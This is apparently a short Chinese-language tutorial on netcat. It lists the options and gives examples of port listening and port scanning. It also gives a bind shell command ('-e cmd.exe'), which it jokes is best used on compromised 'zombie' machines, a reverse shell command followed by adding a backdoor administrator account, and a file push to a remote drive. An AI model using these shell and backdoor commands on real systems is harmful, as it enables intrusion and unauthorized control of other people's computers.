一、基本使用 

　　想要连接到某处: nc [-options] hostname port[s] [ports] … 

　　绑定端口等待连接: nc -l -p port [-options] [hostname] [port] 

　　参数: 

　　-e prog 程序重定向，一旦连接，就执行 [危险!!] 

　　-g gateway source-routing hop point[s], up to 8 

　　-G num source-routing pointer: 4, 8, 12, … 

　　-h 帮助信息 

　　-I secs 延时的间隔 

　　-l 监听模式，用于入站连接 

　　-n 指定数字的IP地址，不能用hostname 

　　-o file 记录16进制的传输 

　　-p port 本地端口号 

　　-r 任意指定本地及远程端口 

　　-s addr 本地源地址 

　　-t 以telnet的形式应答 

　　-u UDP模式 

　　-v 详细输出——用两个-v可得到更详细的内容 

　　-w secs timeout的时间 

　　-z 将输入输出关掉——用于扫描时 

　　二. 它的简单使用方法 

　　1.nc -l -p 80 

　　监听80端口 

　　2.nc -l -p 80 >c:\log.dat 

　　监听80端口，并把信息记录到log.dat 

　　3.nc -v -l -p 80 

　　监听80端口，并显示端口信息 

　　4.nc -vv -l -p 80 

　　一样是监听端口，但显示端口信息更详细 

　　5.nc -l -p 80 -t -e cmd.exe 

　　监听本地的80端口的入站信息，同时将cmd.exe重定向至80端口，当有人连接的时候，就让cmd.exe以telnet的形式应答。当然这个最好用在肉鸡上，哈哈。 

　　6.nc -v ip port 

　　扫描某ip的某个端口 

　　7.nc -v -z ip port-port 

　　扫描某ip的某端口到某端口 

　　8.nc -v -z -u ip port-port 

　　扫描某ip的某udp端口到某udp端口 

　　三.几个使用的例子 

　　1. 计算机192.168.0.1运行：nc -v -n -p 99 

　　 计算机192.168.0.8运行：nc -e cmd.exe 192.168.0.1 99 

　　这样我们就获得了192.168.0.8的一个shell哦，看看权限吧，添加一个用户123加入管理员组，yes！

    2.计算机192.168.0.1运行：nc -v -n 192.168.0.8 99 

　　 计算机192.168.0.8运行：nc -v -l -p 99 >d:\sc.exe 

　　 ok，让我们来看看远程计算机的d盘吧

　　 好了，今天就介绍到这里吧，其实nc的功能是很强大的，我们只是做了简单的介绍。还有什么好的方法来信告诉我吧!